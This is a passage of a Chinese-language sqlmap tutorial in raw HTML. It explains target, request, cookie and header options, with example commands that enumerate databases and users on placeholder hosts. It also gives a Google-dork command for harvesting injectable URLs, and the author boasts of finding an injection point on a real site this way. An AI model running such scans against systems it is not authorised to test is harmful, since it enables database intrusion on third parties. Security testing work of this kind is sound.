Roman';\">https:\/\/github.com\/sqlmapproject\/sqlmap\/tarball\/master<\/span><\/a><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u4e0b\u8f7d\u6700\u65b0\u7248\u672c<span>sqlmap<\/span><span>\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New 
Roman';\">\u4e5f\u53ef\u4ee5\u4f7f\u7528<span>git<\/span><span>\u6765\u83b7\u53d6<\/span><span>sqlmap<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">git&nbsp;clone&nbsp;https:\/\/github.com\/sqlmapproject\/sqlmap.git&nbsp;sqlmap-dev<\/span><span style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u4e4b\u540e\u53ef\u4ee5\u76f4\u63a5\u4f7f\u7528\u547d\u4ee4\u6765\u66f4\u65b0<\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">python&nbsp;sqlmap.py&nbsp;--update<\/span><span style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u6216\u8005<\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">git&nbsp;pull<\/span><span style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u66f4\u65b0<span>sqlmap<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u5982\u679c\u4f60\u60f3\u89c2\u5bdf<span>sqlmap<\/span><span>\u5bf9\u4e00\u4e2a\u70b9\u662f\u8fdb\u884c\u4e86\u600e\u6837\u7684\u5c1d\u8bd5\u5224\u65ad\u4ee5\u53ca\u8bfb\u53d6\u6570\u636e\u7684\uff0c\u53ef\u4ee5\u4f7f\u7528<\/span><span>-v<\/span><span>\u53c2\u6570\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New 
Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u5171\u6709\u4e03\u4e2a\u7b49\u7ea7\uff0c\u9ed8\u8ba4\u4e3a<span>1<\/span><span>\uff1a<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">0<span>\u3001\u53ea\u663e\u793a<\/span><span>python<\/span><span>\u9519\u8bef\u4ee5\u53ca\u4e25\u91cd\u7684\u4fe1\u606f\u3002<\/span><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">1<span>\u3001\u540c\u65f6\u663e\u793a\u57fa\u672c\u4fe1\u606f\u548c\u8b66\u544a\u4fe1\u606f\u3002\uff08\u9ed8\u8ba4\uff09<\/span><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">2<span>\u3001\u540c\u65f6\u663e\u793a<\/span><span>debug<\/span><span>\u4fe1\u606f\u3002<\/span><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">3<span>\u3001\u540c\u65f6\u663e\u793a\u6ce8\u5165\u7684<\/span><span>payload<\/span><span>\u3002<\/span><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier 
New';\">4<span>\u3001\u540c\u65f6\u663e\u793a<\/span><span>HTTP<\/span><span>\u8bf7\u6c42\u3002<\/span><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">5<span>\u3001\u540c\u65f6\u663e\u793a<\/span><span>HTTP<\/span><span>\u54cd\u5e94\u5934\u3002<\/span><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">6<span>\u3001\u540c\u65f6\u663e\u793a<\/span><span>HTTP<\/span><span>\u54cd\u5e94\u9875\u9762\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u5982\u679c\u4f60\u60f3\u770b\u5230<span>sqlmap<\/span><span>\u53d1\u9001\u7684\u6d4b\u8bd5<\/span><span>payload<\/span><span>\u6700\u597d\u7684\u7b49\u7ea7\u5c31\u662f<\/span><span>3<\/span><span>\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h2><span class=\"ez-toc-section\" id=\"%E8%8E%B7%E5%8F%96%E7%9B%AE%E6%A0%87%E6%96%B9%E5%BC%8F\"><\/span>\n\t<span style=\"font-weight:bold;font-size:18.0000pt;font-family:'\u5b8b\u4f53';\">\u83b7\u53d6\u76ee\u6807\u65b9\u5f0f<\/span><span style=\"font-weight:bold;font-size:18.0000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p class=\"p0\">\n\t<span style=\"font-size:10.5000pt;font-family:'Times New Roman';\">&nbsp;<\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E7%9B%AE%E6%A0%87URL\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u76ee\u6807URL<\/span><span 
style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>-u<\/span><span>\u6216\u8005<\/span><span>--url<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u683c\u5f0f\uff1a<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">http(s):\/\/targeturl[:port]\/[\u2026]<\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u4f8b\u5982\uff1a<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">python&nbsp;sqlmap.py&nbsp;-u&nbsp;&quot;http:\/\/www.target.com\/vuln.php?id=1&quot;&nbsp;-f&nbsp;--banner&nbsp;--dbs&nbsp;--users<\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u4ece<span>Burp<\/span><span>\u6216\u8005<\/span><span>WebScarab<\/span><span>\u4ee3\u7406\u4e2d\u83b7\u53d6\u65e5\u5fd7<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>-l<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New 
Roman';\">\u53ef\u4ee5\u76f4\u63a5\u628a<span>Burp&nbsp;proxy<\/span><span>\u6216\u8005<\/span><span>WebScarab&nbsp;proxy<\/span><span>\u4e2d\u7684\u65e5\u5fd7\u76f4\u63a5\u5bfc\u51fa\u6765\u4ea4\u7ed9<\/span><span>sqlmap<\/span><span>\u6765\u4e00\u4e2a\u4e00\u4e2a\u68c0\u6d4b\u662f\u5426\u6709\u6ce8\u5165\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E4%BB%8E%E6%96%87%E6%9C%AC%E4%B8%AD%E8%8E%B7%E5%8F%96%E5%A4%9A%E4%B8%AA%E7%9B%AE%E6%A0%87%E6%89%AB%E6%8F%8F\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u4ece\u6587\u672c\u4e2d\u83b7\u53d6\u591a\u4e2a\u76ee\u6807\u626b\u63cf<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>-m<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u6587\u4ef6\u4e2d\u4fdd\u5b58<span>url<\/span><span>\u683c\u5f0f\u5982\u4e0b\uff0c<\/span><span>sqlmap<\/span><span>\u4f1a\u4e00\u4e2a\u4e00\u4e2a\u68c0\u6d4b<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">www.target1.com\/vuln1.php?q=foobar<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">www.target2.com\/vuln2.asp?id=1<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" 
style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">www.target3.com\/vuln3\/id\/1*<\/span><span style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E4%BB%8E%E6%96%87%E4%BB%B6%E4%B8%AD%E5%8A%A0%E8%BD%BDHTTP%E8%AF%B7%E6%B1%82\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u4ece\u6587\u4ef6\u4e2d\u52a0\u8f7dHTTP\u8bf7\u6c42<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>-r<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">sqlmap<span>\u53ef\u4ee5\u4ece\u4e00\u4e2a\u6587\u672c\u6587\u4ef6\u4e2d\u83b7\u53d6<\/span><span>HTTP<\/span><span>\u8bf7\u6c42\uff0c\u8fd9\u6837\u5c31\u53ef\u4ee5\u8df3\u8fc7\u8bbe\u7f6e\u4e00\u4e9b\u5176\u4ed6\u53c2\u6570\uff08\u6bd4\u5982<\/span><span>cookie<\/span><span>\uff0c<\/span><span>POST<\/span><span>\u6570\u636e\uff0c\u7b49\u7b49\uff09\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u6bd4\u5982\u6587\u672c\u6587\u4ef6\u5185\u5982\u4e0b\uff1a<\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">POST&nbsp;\/vuln.php&nbsp;HTTP\/1.1<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier 
New';\">Host:&nbsp;www.target.com<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">User-Agent:&nbsp;Mozilla\/4.0<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">id=1<\/span><span style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u5f53\u8bf7\u6c42\u662f<span>HTTPS<\/span><span>\u7684\u65f6\u5019\u4f60\u9700\u8981\u914d\u5408\u8fd9\u4e2a<\/span><span>--force-ssl<\/span><span>\u53c2\u6570\u6765\u4f7f\u7528\uff0c\u6216\u8005\u4f60\u53ef\u4ee5\u5728<\/span><span>Host<\/span><span>\u5934\u540e\u9762\u52a0\u4e0a<\/span><span>:443<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E5%A4%84%E7%90%86Google%E7%9A%84%E6%90%9C%E7%B4%A2%E7%BB%93%E6%9E%9C\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u5904\u7406Google\u7684\u641c\u7d22\u7ed3\u679c<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>-g<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New 
Roman';\">sqlmap<span>\u53ef\u4ee5\u6d4b\u8bd5\u6ce8\u5165<\/span><span>Google<\/span><span>\u7684\u641c\u7d22\u7ed3\u679c\u4e2d\u7684<\/span><span>GET<\/span><span>\u53c2\u6570\uff08\u53ea\u83b7\u53d6\u524d<\/span><span>100<\/span><span>\u4e2a\u7ed3\u679c\uff09\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u4f8b\u5b50\uff1a<\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">python&nbsp;sqlmap.py&nbsp;-g&nbsp;&#8220;inurl:\\&#8221;.php?id=1\\&#8221;&#8221;<\/span><span style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\uff08\u5f88\u725b<span>B<\/span><span>\u7684\u529f\u80fd\uff0c\u6d4b\u8bd5\u4e86\u4e00\u4e0b\uff0c\u7b2c\u5341\u51e0\u4e2a\u5c31\u627e\u5230\u65b0\u6d6a\u7684\u4e00\u4e2a\u6ce8\u5165\u70b9\uff09<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u6b64\u5916\u53ef\u4ee5\u4f7f\u7528<span>-c<\/span><span>\u53c2\u6570\u52a0\u8f7d<\/span><span>sqlmap.conf<\/span><span>\u6587\u4ef6\u91cc\u9762\u7684\u76f8\u5173\u914d\u7f6e\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h2><span class=\"ez-toc-section\" id=\"%E8%AF%B7%E6%B1%82\"><\/span>\n\t<span style=\"font-weight:bold;font-size:18.0000pt;font-family:'\u5b8b\u4f53';\">\u8bf7\u6c42<\/span><span style=\"font-weight:bold;font-size:18.0000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p class=\"p0\">\n\t<span style=\"font-size:10.5000pt;font-family:'Times New 
Roman';\">&nbsp;<\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"http%E6%95%B0%E6%8D%AE\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">http\u6570\u636e<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>--data<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u6b64\u53c2\u6570\u662f\u628a\u6570\u636e\u4ee5<span>POST<\/span><span>\u65b9\u5f0f\u63d0\u4ea4\uff0c<\/span><span>sqlmap<\/span><span>\u4f1a\u50cf\u68c0\u6d4b<\/span><span>GET<\/span><span>\u53c2\u6570\u4e00\u6837\u68c0\u6d4b<\/span><span>POST<\/span><span>\u7684\u53c2\u6570\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u4f8b\u5b50\uff1a<\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">python&nbsp;sqlmap.py&nbsp;-u&nbsp;&quot;http:\/\/www.target.com\/vuln.php&quot;&nbsp;--data=&quot;id=1&quot;&nbsp;-f&nbsp;--banner&nbsp;--dbs&nbsp;--users<\/span><span style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E5%8F%82%E6%95%B0%E6%8B%86%E5%88%86%E5%AD%97%E7%AC%A6\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u53c2\u6570\u62c6\u5206\u5b57\u7b26<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span 
class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>--param-del<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u5f53<span>GET<\/span><span>\u6216<\/span><span>POST<\/span><span>\u7684\u6570\u636e\u9700\u8981\u7528\u5176\u4ed6\u5b57\u7b26\u5206\u5272\u6d4b\u8bd5\u53c2\u6570\u7684\u65f6\u5019\u9700\u8981\u7528\u5230\u6b64\u53c2\u6570\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u4f8b\u5b50\uff1a<\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">python&nbsp;sqlmap.py&nbsp;-u&nbsp;&quot;http:\/\/www.target.com\/vuln.php&quot;&nbsp;--data=&quot;query=foobar;id=1&quot;&nbsp;--param-del=&quot;;&quot;&nbsp;-f&nbsp;--banner&nbsp;--dbs&nbsp;--users<\/span><span style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"HTTP_cookie%E5%A4%B4\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">HTTP&nbsp;cookie\u5934<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>--cookie,--load-cookies,--drop-set-cookie<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New 
Roman';\">\u8fd9\u4e2a\u53c2\u6570\u5728\u4ee5\u4e0b\u4e24\u4e2a\u65b9\u9762\u5f88\u6709\u7528\uff1a<\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">1<span>\u3001<\/span><span>web<\/span><span>\u5e94\u7528\u9700\u8981\u767b\u5f55\u7684\u65f6\u5019\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">2<span>\u3001\u4f60\u60f3\u8981\u5728\u8fd9\u4e9b\u5934\u53c2\u6570\u4e2d\u6d4b\u8bd5<\/span><span>SQL<\/span><span>\u6ce8\u5165\u65f6\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53ef\u4ee5\u901a\u8fc7\u6293\u5305\u628a<span>cookie<\/span><span>\u83b7\u53d6\u5230\uff0c\u590d\u5236\u51fa\u6765\uff0c\u7136\u540e\u52a0\u5230<\/span><span>--cookie<\/span><span>\u53c2\u6570\u91cc\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u5728<span>HTTP<\/span><span>\u8bf7\u6c42\u4e2d\uff0c\u9047\u5230<\/span><span>Set-Cookie<\/span><span>\u7684\u8bdd\uff0c<\/span><span>sqlmap<\/span><span>\u4f1a\u81ea\u52a8\u83b7\u53d6\u5e76\u4e14\u5728\u4ee5\u540e\u7684\u8bf7\u6c42\u4e2d\u52a0\u5165\uff0c\u5e76\u4e14\u4f1a\u5c1d\u8bd5<\/span><span>SQL<\/span><span>\u6ce8\u5165\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New 
Roman';\">\u5982\u679c\u4f60\u4e0d\u60f3\u63a5\u53d7<span>Set-Cookie<\/span><span>\u53ef\u4ee5\u4f7f\u7528<\/span><span>--drop-set-cookie<\/span><span>\u53c2\u6570\u6765\u62d2\u7edd\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u5f53\u4f60\u4f7f\u7528<span>--cookie<\/span><span>\u53c2\u6570\u65f6\uff0c\u5f53\u8fd4\u56de\u4e00\u4e2a<\/span><span>Set-Cookie<\/span><span>\u5934\u7684\u65f6\u5019\uff0c<\/span><span>sqlmap<\/span><span>\u4f1a\u8be2\u95ee\u4f60\u7528\u54ea\u4e2a<\/span><span>cookie<\/span><span>\u6765\u7ee7\u7eed\u63a5\u4e0b\u6765\u7684\u8bf7\u6c42\u3002\u5f53<\/span><span>--level<\/span><span>\u7684\u53c2\u6570\u8bbe\u5b9a\u4e3a<\/span><span>2<\/span><span>\u6216\u8005<\/span><span>2<\/span><span>\u4ee5\u4e0a\u7684\u65f6\u5019\uff0c<\/span><span>sqlmap<\/span><span>\u4f1a\u5c1d\u8bd5\u6ce8\u5165<\/span><span>Cookie<\/span><span>\u53c2\u6570\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"HTTP_User-Agent%E5%A4%B4\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">HTTP&nbsp;User-Agent\u5934<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>--user-agent,--random-agent<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New 
Roman';\">\u9ed8\u8ba4\u60c5\u51b5\u4e0b<span>sqlmap<\/span><span>\u7684<\/span><span>HTTP<\/span><span>\u8bf7\u6c42\u5934\u4e2d<\/span><span>User-Agent<\/span><span>\u503c\u662f\uff1a<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">sqlmap\/1.0-dev-xxxxxxx&nbsp;(http:\/\/sqlmap.org)<\/span><span style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53ef\u4ee5\u4f7f\u7528<span>&#8211;user-agent<\/span><span>\u53c2\u6570\u6765\u4fee\u6539\uff0c\u540c\u65f6\u4e5f\u53ef\u4ee5\u4f7f\u7528<\/span><span>&#8211;random-agent<\/span><span>\u53c2\u6570\u6765\u968f\u673a\u7684\u4ece<\/span><span>.\/txt\/user-agents.txt<\/span><span>\u4e2d\u83b7\u53d6\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u5f53<span>&#8211;level<\/span><span>\u53c2\u6570\u8bbe\u5b9a\u4e3a<\/span><span>3<\/span><span>\u6216\u8005<\/span><span>3<\/span><span>\u4ee5\u4e0a\u7684\u65f6\u5019\uff0c\u4f1a\u5c1d\u8bd5\u5bf9<\/span><span>User-Agent<\/span><span>\u8fdb\u884c\u6ce8\u5165\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"HTTP_Referer%E5%A4%B4\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">HTTP&nbsp;Referer\u5934<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;referer<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times 
